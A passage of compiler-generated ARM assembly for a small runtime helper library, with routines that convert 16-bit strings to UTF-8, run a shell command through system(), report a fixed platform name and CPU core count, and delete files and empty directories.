str r2, [fp, #-316] str r3, [fp, #-312] b .L98 .L99: sub r1, fp, #316 ldmia r1, {r0-r1} sub r3, fp, #332 ldmia r3, {r2-r3} subs r4, r0, r2 sbc r5, r1, r3 adds r3, r4, #256 str r3, [fp, #-428] adc r3, r5, #0 str r3, [fp, #-424] sub r3, fp, #288 ldr r2, [fp, #-428] add r3, r3, r2 ldrb r1, [r3] @ zero_extendqisi2 sub r2, fp, #288 ldr r3, [fp, #-316] add r2, r2, r3 mov r3, r1 strb r3, [r2] sub r3, fp, #316 ldmia r3, {r2-r3} adds r6, r2, #1 adc r7, r3, #0 str r6, [fp, #-316] str r7, [fp, #-312] .L98: sub r1, fp, #316 ldmia r1, {r0-r1} sub r3, fp, #332 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bcc .L99 b .L101 .L78: sub r3, fp, #340 ldmia r3, {r2-r3} orrs r3, r2, r3 beq .L97 sub r3, fp, #332 ldmia r3, {r2-r3} orrs r3, r2, r3 bne .L97 ldr r3, [fp, #-388] ldr r2, [fp, #-360] str r2, [r3] ldr r1, [fp, #-384] sub r3, fp, #340 ldmia r3, {r2-r3} stm r1, {r2-r3} mov r3, #1 b .L103 .L107: nop .L97: ldr r3, [fp, #-360] cmp r3, #0 beq .L102 ldr r0, [fp, #-360] bl free .L102: ldr r3, [fp, #-388] mov r2, #0 str r2, [r3] ldr r1, [fp, #-384] mov r2, #0 mov r3, #0 stm r1, {r2-r3} mov r3, #0 .L103: ldr r2, .L108 ldr r1, [r2] ldr r2, [fp, #-32] eors r1, r2, r1 mov r2, #0 beq .L104 bl __stack_chk_fail .L104: mov r0, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L109: .align 2 .L108: .word .LC1 .word stderr .word .LC0 .word stdin .size shar__get__string__from__cmd__line, .-shar__get__string__from__cmd__line .align 2 .global shar__get__platform__name .syntax unified .arm .fpu softvfp .type shar__get__platform__name, %function shar__get__platform__name: @ args = 0, pretend = 0, frame = 32 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, fp, lr} add fp, sp, #12 sub sp, sp, #32 str r0, [fp, #-36] str r1, [fp, #-32] str r2, [fp, #-40] str r3, [fp, #-44] sub r3, fp, #36 ldmia r3, {r2-r3} adds r4, r2, #24 adc r5, r3, #0 str r4, [fp, #-20] str r5, [fp, #-16] ldr r3, [fp, #-20] mov r0, r3 bl malloc mov r3, r0 str r3, [fp, #-24] ldr r3, [fp, #-24] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L111 ldr r3, .L113 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L113+4 bl fwrite mov r0, #1 bl exit .L111: ldr r2, [fp, #-24] ldr r3, [fp, #-44] str r2, [r3] ldr r1, [fp, #-40] mov r2, #12 mov r3, #0 stm r1, {r2-r3} ldr r3, [fp, #-44] ldr r2, [r3] ldr r3, [fp, #-36] add r3, r2, r3 str r3, [fp, #-28] ldr r3, [fp, #-28] mov r2, #76 strh r2, [r3] @ movhi ldr r3, [fp, #-28] add r3, r3, #2 mov r2, #105 strh r2, [r3] @ movhi ldr r3, [fp, #-28] add r3, r3, #4 mov r2, #110 strh r2, [r3] @ movhi ldr r3, [fp, #-28] add r3, r3, #6 mov r2, #117 strh r2, [r3] @ movhi ldr r3, [fp, #-28] add r3, r3, #8 mov r2, #120 strh r2, [r3] @ movhi ldr r3, [fp, #-28] add r3, r3, #10 mov r2, #32 strh r2, [r3] @ movhi ldr r3, [fp, #-28] add r3, r3, #12 mov r2, #120 strh r2, [r3] @ movhi ldr r3, [fp, #-28] add r3, r3, #14 mov r2, #56 strh r2, [r3] @ movhi ldr r3, [fp, #-28] add r3, r3, #16 mov r2, #54 strh r2, [r3] @ movhi ldr r3, [fp, #-28] add r3, r3, #18 mov r2, #95 strh r2, [r3] @ movhi ldr r3, [fp, #-28] add r3, r3, #20 mov r2, #54 strh r2, [r3] @ movhi ldr r3, [fp, #-28] add r3, r3, #22 mov r2, #52 strh r2, [r3] @ movhi nop sub sp, fp, #12 @ sp needed pop {r4, r5, fp, pc} .L114: .align 2 .L113: .word stderr .word .LC0 .size shar__get__platform__name, .-shar__get__platform__name .align 2 .global shar__execute__command .syntax unified .arm .fpu softvfp .type shar__execute__command, %function shar__execute__command: @ args = 0, pretend = 0, frame = 104 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #104 str r0, [fp, #-116] str r1, [fp, #-112] str r2, [fp, #-120] sub r3, fp, #116 ldmia r3, {r2-r3} orrs r3, r2, r3 bne .L116 mov r3, #0 b .L117 .L116: sub r3, fp, #116 ldmia r3, {r2-r3} str r2, [fp, #-76] str r3, [fp, #-72] ldr r3, [fp, #-120] str r3, [fp, #-100] mov r3, #0 str r3, [fp, #-96] mov r2, #0 mov r3, #0 str r2, [fp, #-68] str r3, [fp, #-64] mov r2, #0 mov r3, #0 str r2, [fp, #-60] str r3, [fp, #-56] mov r2, #0 mov r3, #0 str r2, [fp, #-52] str r3, [fp, #-48] b .L118 .L130: ldr r3, [fp, #-52] lsl r3, r3, #1 ldr r2, [fp, #-100] add r3, r2, r3 ldrh r3, [r3] @ movhi strh r3, [fp, #-106] @ movhi mov r3, #0 strb r3, [fp, #-107] ldrh r3, [fp, #-106] cmp r3, #0 beq .L134 ldrh r3, [fp, #-106] cmp r3, #127 bhi .L121 mov r3, #1 strb r3, [fp, #-107] b .L122 .L121: ldrh r3, [fp, #-106] cmp r3, #2048 bcs .L123 mov r3, #2 strb r3, [fp, #-107] b .L122 .L123: mov r3, #3 strb r3, [fp, #-107] .L122: ldrb r2, [fp, #-107] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #60 ldmia r1, {r0-r1} adds r6, r0, r2 adc r7, r1, r3 str r6, [fp, #-60] str r7, [fp, #-56] ldr r3, [fp, #-96] str r3, [fp, #-92] sub r3, fp, #60 ldmia r3, {r2-r3} str r2, [fp, #-44] str r3, [fp, #-40] ldr r3, [fp, #-44] mov r1, r3 ldr r0, [fp, #-92] bl realloc str r0, [fp, #-88] ldr r3, [fp, #-88] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L124 ldr r3, .L135 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L135+4 bl fwrite mov r0, #1 bl exit .L124: ldr r3, [fp, #-88] str r3, [fp, #-96] ldrb r3, [fp, #-107] @ zero_extendqisi2 cmp r3, #3 beq .L126 cmp r3, #3 bgt .L127 cmp r3, #1 beq .L128 cmp r3, #2 beq .L129 b .L127 .L128: ldr r3, [fp, #-68] ldr r2, [fp, #-96] add r3, r2, r3 ldrh r2, [fp, #-106] @ movhi and r2, r2, #255 strb r2, [r3] b .L127 .L129: ldrh r3, [fp, #-106] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-68] ldr r1, [fp, #-96] add r2, r1, r2 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-106] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #1 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] b .L127 .L126: ldrh r3, [fp, #-106] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-68] ldr r1, [fp, #-96] add r2, r1, r2 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-106] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #1 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] ldrh r3, [fp, #-106] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-68] add r3, r3, #2 ldr r1, [fp, #-96] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] nop .L127: ldrb r2, [fp, #-107] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #68 ldmia r1, {r0-r1} adds r8, r0, r2 adc r9, r1, r3 str r8, [fp, #-68] str r9, [fp, #-64] b .L120 .L134: nop .L120: sub r3, fp, #52 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-132] adc r3, r3, #0 str r3, [fp, #-128] sub r3, fp, #132 ldmia r3, {r2-r3} str r2, [fp, #-52] str r3, [fp, #-48] .L118: sub r1, fp, #76 ldmia r1, {r0-r1} sub r3, fp, #52 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L130 sub r3, fp, #60 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 ldr r3, [fp, #-96] str r3, [fp, #-84] str r4, [fp, #-36] str r5, [fp, #-32] ldr r3, [fp, #-36] mov r1, r3 ldr r0, [fp, #-84] bl realloc str r0, [fp, #-80] ldr r3, [fp, #-80] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L131 ldr r3, .L135 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L135+4 bl fwrite mov r0, #1 bl exit .L131: ldr r3, [fp, #-80] str r3, [fp, #-96] ldr r3, [fp, #-68] ldr r2, [fp, #-96] add r3, r2, r3 mov r2, #0 strb r2, [r3] ldr r3, [fp, #-96] str r3, [fp, #-104] ldr r0, [fp, #-104] bl system mov r3, r0 cmp r3, #0 moveq r3, #1 movne r3, #0 strb r3, [fp, #-108] ldr r0, [fp, #-104] bl free ldrb r3, [fp, #-108] @ zero_extendqisi2 .L117: mov r0, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L136: .align 2 .L135: .word stderr .word .LC0 .size shar__execute__command, .-shar__execute__command .align 2 .global shar__get__cpu__cores__number .syntax unified .arm .fpu softvfp .type shar__get__cpu__cores__number, %function shar__get__cpu__cores__number: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 ldr r3, .L139 ldmia r3, {r2-r3} mov r0, r2 mov r1, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L140: .align 2 .L139: .word cpuCoresNumber .size shar__get__cpu__cores__number, .-shar__get__cpu__cores__number .section .rodata .align 2 .LC2: .word __stack_chk_guard .text .align 2 .global shar__delete__file .syntax unified .arm .fpu softvfp .type shar__delete__file, %function shar__delete__file: @ args = 0, pretend = 0, frame = 200 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #200 str r0, [fp, #-212] str r1, [fp, #-208] str r2, [fp, #-216] ldr r3, .L164 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 sub r3, fp, #212 ldmia r3, {r2-r3} str r2, [fp, #-172] str r3, [fp, #-168] ldr r3, [fp, #-216] str r3, [fp, #-196] mov r3, #0 str r3, [fp, #-192] mov r2, #0 mov r3, #0 str r2, [fp, #-164] str r3, [fp, #-160] mov r2, #0 mov r3, #0 str r2, [fp, #-156] str r3, [fp, #-152] mov r2, #0 mov r3, #0 str r2, [fp, #-148] str r3, [fp, #-144] b .L142 .L154: ldr r3, [fp, #-148] lsl r3, r3, #1 ldr r2, [fp, #-196] add r3, r2, r3 ldrh r3, [r3] @ movhi strh r3, [fp, #-202] @ movhi mov r3, #0 strb r3, [fp, #-203] ldrh r3, [fp, #-202] cmp r3, #0 beq .L163 ldrh r3, [fp, #-202] cmp r3, #127 bhi .L145 mov r3, #1 strb r3, [fp, #-203] b .L146 .L145: ldrh r3, [fp, #-202] cmp r3, #2048 bcs .L147 mov r3, #2 strb r3, [fp, #-203] b .L146 .L147: mov r3, #3 strb r3, [fp, #-203] .L146: ldrb r2, [fp, #-203] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #156 ldmia r1, {r0-r1} adds r6, r0, r2 adc r7, r1, r3 str r6, [fp, #-156] str r7, [fp, #-152] ldr r3, [fp, #-192] str r3, [fp, #-188] sub r3, fp, #156 ldmia r3, {r2-r3} str r2, [fp, #-140] str r3, [fp, #-136] ldr r3, [fp, #-140] mov r1, r3 ldr r0, [fp, #-188] bl realloc str r0, [fp, #-184] ldr r3, [fp, #-184] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L148 ldr r3, .L164+4 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L164+8 bl fwrite mov r0, #1 bl exit .L148: ldr r3, [fp, #-184] str r3, [fp, #-192] ldrb r3, [fp, #-203] @ zero_extendqisi2 cmp r3, #3 beq .L150 cmp r3, #3 bgt .L151 cmp r3, #1 beq .L152 cmp r3, #2 beq .L153 b .L151 .L152: ldr r3, [fp, #-164] ldr r2, [fp, #-192] add r3, r2, r3 ldrh r2, [fp, #-202] @ movhi and r2, r2, #255 strb r2, [r3] b .L151 .L153: ldrh r3, [fp, #-202] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-164] ldr r1, [fp, #-192] add r2, r1, r2 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-202] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-164] add r3, r3, #1 ldr r1, [fp, #-192] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] b .L151 .L150: ldrh r3, [fp, #-202] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-164] ldr r1, [fp, #-192] add r2, r1, r2 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-202] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-164] add r3, r3, #1 ldr r1, [fp, #-192] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] ldrh r3, [fp, #-202] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-164] add r3, r3, #2 ldr r1, [fp, #-192] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] nop .L151: ldrb r2, [fp, #-203] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #164 ldmia r1, {r0-r1} adds r8, r0, r2 adc r9, r1, r3 str r8, [fp, #-164] str r9, [fp, #-160] b .L144 .L163: nop .L144: sub r3, fp, #148 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-228] adc r3, r3, #0 str r3, [fp, #-224] sub r3, fp, #228 ldmia r3, {r2-r3} str r2, [fp, #-148] str r3, [fp, #-144] .L142: sub r1, fp, #172 ldmia r1, {r0-r1} sub r3, fp, #148 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L154 sub r3, fp, #156 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 ldr r3, [fp, #-192] str r3, [fp, #-180] str r4, [fp, #-132] str r5, [fp, #-128] ldr r3, [fp, #-132] mov r1, r3 ldr r0, [fp, #-180] bl realloc str r0, [fp, #-176] ldr r3, [fp, #-176] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L155 ldr r3, .L164+4 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L164+8 bl fwrite mov r0, #1 bl exit .L155: ldr r3, [fp, #-176] str r3, [fp, #-192] ldr r3, [fp, #-164] ldr r2, [fp, #-192] add r3, r2, r3 mov r2, #0 strb r2, [r3] ldr r3, [fp, #-192] str r3, [fp, #-200] sub r3, fp, #124 mov r1, r3 ldr r0, [fp, #-200] bl stat mov r3, r0 cmp r3, #0 moveq r3, #1 movne r3, #0 strb r3, [fp, #-204] ldrb r3, [fp, #-204] @ zero_extendqisi2 cmp r3, #0 beq .L158 ldr r3, [fp, #-108] and r3, r3, #16384 cmp r3, #0 bne .L158 mov r3, #1 b .L159 .L158: mov r3, #0 .L159: strb r3, [fp, #-204] ldrb r3, [fp, #-204] and r3, r3, #1 strb r3, [fp, #-204] ldrb r3, [fp, #-204] @ zero_extendqisi2 cmp r3, #0 beq .L160 ldr r0, [fp, #-200] bl remove mov r3, r0 cmp r3, #0 moveq r3, #1 movne r3, #0 strb r3, [fp, #-204] .L160: ldr r0, [fp, #-200] bl free ldrb r3, [fp, #-204] @ zero_extendqisi2 ldr r2, .L164 ldr r1, [r2] ldr r2, [fp, #-32] eors r1, r2, r1 mov r2, #0 beq .L162 bl __stack_chk_fail .L162: mov r0, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L165: .align 2 .L164: .word .LC2 .word stderr .word .LC0 .size shar__delete__file, .-shar__delete__file .section .rodata .align 2 .LC3: .word __stack_chk_guard .text .align 2 .global shar__delete__empty__directory .syntax unified .arm .fpu softvfp .type shar__delete__empty__directory, %function shar__delete__empty__directory: @ args = 0, pretend = 0, frame = 200 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #200 str r0, [fp, #-212] str r1, [fp, #-208] str r2, [fp, #-216] ldr r3, .L189 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 sub r3, fp, #212 ldmia r3, {r2-r3} str r2, [fp, #-172] str r3, [fp, #-168] ldr r3, [fp, #-216] str r3, [fp, #-196] mov r3, #0 str r3, [fp, #-192] mov r2, #0 mov r3, #0 str r2, [fp, #-164] str r3, [fp, #-160] mov r2, #0 mov r3, #0 str r2, [fp, #-156] str r3, [fp, #-152] mov r2, #0 mov r3, #0 str r2, [fp, #-148] str r3, [fp, #-144] b .L167 .L179: ldr r3, [fp, #-148] lsl r3, r3, #1 ldr r2, [fp, #-196] add r3, r2, r3 ldrh r3, [r3] @ movhi strh r3, [fp, #-202] @ movhi mov r3, #0 strb r3, [fp, #-203] ldrh r3, [fp, #-202] cmp r3, #0 beq .L188 ldrh r3, [fp, #-202] cmp r3, #127 bhi .L170 mov r3, #1 strb r3, [fp, #-203] b .L171 .L170: ldrh r3, [fp, #-202] cmp r3, #2048 bcs .L172 mov r3, #2 strb r3, [fp, #-203] b .L171 .L172: mov r3, #3 strb r3, [fp, #-203] .L171: ldrb r2, [fp, #-203] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #156 ldmia r1, {r0-r1} adds r6, r0, r2 adc r7, r1, r3 str r6, [fp, #-156] str r7, [fp, #-152] ldr r3, [fp, #-192] str r3, [fp, #-188] sub r3, fp, #156 ldmia r3, {r2-r3} str r2, [fp, #-140] str r3, [fp, #-136] ldr r3, [fp, #-140] mov r1, r3 ldr r0, [fp, #-188] bl realloc str r0, [fp, #-184] ldr r3, [fp, #-184] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L173 ldr r3, .L189+4 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L189+8 bl fwrite mov r0, #1 bl exit .L173: ldr r3, [fp, #-184] str r3, [fp, #-192] ldrb r3, [fp, #-203] @ zero_extendqisi2 cmp r3, #3 beq .L175 cmp r3, #3 bgt .L176 cmp r3, #1 beq .L177 cmp r3, #2 beq .L178 b .L176 .L177: ldr r3, [fp, #-164] ldr r2, [fp, #-192] add r3, r2, r3 ldrh r2, [fp, #-202] @ movhi and r2, r2, #255 strb r2, [r3] b .L176 .L178: ldrh r3, [fp, #-202] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-164] ldr r1, [fp, #-192] add r2, r1, r2 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-202] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-164] add r3, r3, #1 ldr r1, [fp, #-192] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] b .L176 .L175: ldrh r3, [fp, #-202] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-164] ldr r1, [fp, #-192] add r2, r1, r2 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-202] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-164] add r3, r3, #1 ldr r1, [fp, #-192] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] ldrh r3, [fp, #-202] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-164] add r3, r3, #2 ldr r1, [fp, #-192] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] nop .L176: ldrb r2, [fp, #-203] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #164 ldmia r1, {r0-r1} adds r8, r0, r2 adc r9, r1, r3 str r8, [fp, #-164] str r9, [fp, #-160] b .L169 .L188: nop .L169: sub r3, fp, #148 ldmia r3, {r2-r3} adds r1, r2, #1 str r1, [fp, #-228] adc r3, r3, #0 str r3, [fp, #-224] sub r3, fp, #228 ldmia r3, {r2-r3} str r2, [fp, #-148] str r3, [fp, #-144] .L167: sub r1, fp, #172 ldmia r1, {r0-r1} sub r3, fp, #148 ldmia r3, {r2-r3} cmp r1, r3 cmpeq r0, r2 bhi .L179 sub r3, fp, #156 ldmia r3, {r2-r3} adds r4, r2, #1 adc r5, r3, #0 ldr r3, [fp, #-192] str r3, [fp, #-180] str r4, [fp, #-132] str r5, [fp, #-128] ldr r3, [fp, #-132] mov r1, r3 ldr r0, [fp, #-180] bl realloc str r0, [fp, #-176] ldr r3, [fp, #-176] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L180 ldr r3, .L189+4 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L189+8 bl fwrite mov r0, #1 bl exit .L180: ldr r3, [fp, #-176] str r3, [fp, #-192] ldr r3, [fp, #-164] ldr r2, [fp, #-192] add r3, r2, r3 mov r2, #0 strb r2, [r3] ldr r3, [fp, #-192] str r3, [fp, #-200] sub r3, fp, #124 mov r1, r3 ldr r0, [fp, #-200] bl stat mov r3, r0 cmp r3, #0 moveq r3, #1 movne r3, #0 strb r3, [fp, #-204] ldrb r3, [fp, #-204] @ zero_extendqisi2 cmp r3, #0 beq .L183 ldr r3, [fp, #-108] and r3, r3, #16384 cmp r3, #0 beq .L183 mov r3, #1 b .L184 .L183: mov r3, #0 .L184: strb r3, [fp, #-204] ldrb r3, [fp, #-204] and r3, r3, #1 strb r3, [fp, #-204] ldrb r3, [fp, #-204] @ zero_extendqisi2 cmp r3, #0 beq .L185 ldr r0, [fp, #-200] bl remove mov r3, r0 cmp r3, #0 moveq r3, #1 movne r3, #0 strb r3, [fp, #-204] .L185: ldr r0, [fp, #-200] bl free ldrb r3, [fp, #-204] @ zero_extendqisi2 ldr r2, .L189 ldr r1, [r2] ldr r2, [fp, #-32] eors r1, r2, r1 mov r2, #0 beq .L187 bl __stack_chk_fail .L187: mov r0, r3 sub sp, fp, #28 @ sp needed pop {r4, r5, r6, r7, r8, r9, fp, pc} .L190: .align 2 .L189: .word .LC3 .word stderr .word .LC0 .size shar__delete__empty__directory, .-shar__delete__empty__directory .section .rodata .align 2 .LC4: .word __stack_chk_guard .text .align 2 .global shar__file__is__exist .syntax unified .arm .fpu softvfp .type shar__file__is__exist, %function shar__file__is__exist: @ args = 0, pretend = 0, frame = 200 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, r6, r7, r8, r9, fp, lr} add fp, sp, #28 sub sp, sp, #200 str r0, [fp, #-212] str r1, [fp, #-208] str r2, [fp, #-216] ldr r3, .L213 ldr r3, [r3] str r3, [fp, #-32] mov r3,#0 sub r3, fp, #212 ldmia r3, {r2-r3} str r2, [fp, #-172] str r3, [fp, #-168] ldr r3, [fp, #-216] str r3, [fp, #-196] mov r3, #0 str r3, [fp, #-192] mov r2, #0 mov r3, #0 str r2, [fp, #-164] str r3, [fp, #-160] mov r2, #0 mov r3, #0 str r2, [fp, #-156] str r3, [fp, #-152] mov r2, #0 mov r3, #0 str r2, [fp, #-148] str r3, [fp, #-144] b .L192 .L204: ldr r3, [fp, #-148] lsl r3, r3, #1 ldr r2, [fp, #-196] add r3, r2, r3 ldrh r3, [r3] @ movhi strh r3, [fp, #-202] @ movhi mov r3, #0 strb r3, [fp, #-203] ldrh r3, [fp, #-202] cmp r3, #0 beq .L212 ldrh r3, [fp, #-202] cmp r3, #127 bhi .L195 mov r3, #1 strb r3, [fp, #-203] b .L196 .L195: ldrh r3, [fp, #-202] cmp r3, #2048 bcs .L197 mov r3, #2 strb r3, [fp, #-203] b .L196 .L197: mov r3, #3 strb r3, [fp, #-203] .L196: ldrb r2, [fp, #-203] @ zero_extendqisi2 mov r3, #0 sub r1, fp, #156 ldmia r1, {r0-r1} adds r6, r0, r2 adc r7, r1, r3 str r6, [fp, #-156] str r7, [fp, #-152] ldr r3, [fp, #-192] str r3, [fp, #-188] sub r3, fp, #156 ldmia r3, {r2-r3} str r2, [fp, #-140] str r3, [fp, #-136] ldr r3, [fp, #-140] mov r1, r3 ldr r0, [fp, #-188] bl realloc str r0, [fp, #-184] ldr r3, [fp, #-184] cmp r3, #0 moveq r3, #1 movne r3, #0 and r3, r3, #255 cmp r3, #0 beq .L198 ldr r3, .L213+4 ldr r3, [r3] mov r2, #19 mov r1, #1 ldr r0, .L213+8 bl fwrite mov r0, #1 bl exit .L198: ldr r3, [fp, #-184] str r3, [fp, #-192] ldrb r3, [fp, #-203] @ zero_extendqisi2 cmp r3, #3 beq .L200 cmp r3, #3 bgt .L201 cmp r3, #1 beq .L202 cmp r3, #2 beq .L203 b .L201 .L202: ldr r3, [fp, #-164] ldr r2, [fp, #-192] add r3, r2, r3 ldrh r2, [fp, #-202] @ movhi and r2, r2, #255 strb r2, [r3] b .L201 .L203: ldrh r3, [fp, #-202] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-164] ldr r1, [fp, #-192] add r2, r1, r2 mvn r3, r3, lsl #26 mvn r3, r3, lsr #26 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-202] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-164] add r3, r3, #1 ldr r1, [fp, #-192] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] b .L201 .L200: ldrh r3, [fp, #-202] lsr r3, r3, #12 lsl r3, r3, #16 lsr r3, r3, #16 and r3, r3, #255 ldr r2, [fp, #-164] ldr r1, [fp, #-192] add r2, r1, r2 mvn r3, r3, lsl #27 mvn r3, r3, lsr #27 and r3, r3, #255 strb r3, [r2] ldrh r3, [fp, #-202] lsr r3, r3, #6 lsl r3, r3, #16 lsr r3, r3, #16 lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-164] add r3, r3, #1 ldr r1, [fp, #-192] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] ldrh r3, [fp, #-202] @ movhi lsl r3, r3, #24 asr r3, r3, #24 and r3, r3, #63 lsl r3, r3, #24 asr r3, r3, #24 mvn r3, r3, lsl #25 mvn r3, r3, lsr #25 lsl r3, r3, #24 asr r2, r3, #24 ldr r3, [fp, #-164] add r3, r3, #2 ldr r1, [fp, #-192] add r3, r1, r3 and r2, r2, #255 strb r2, [r3] nop 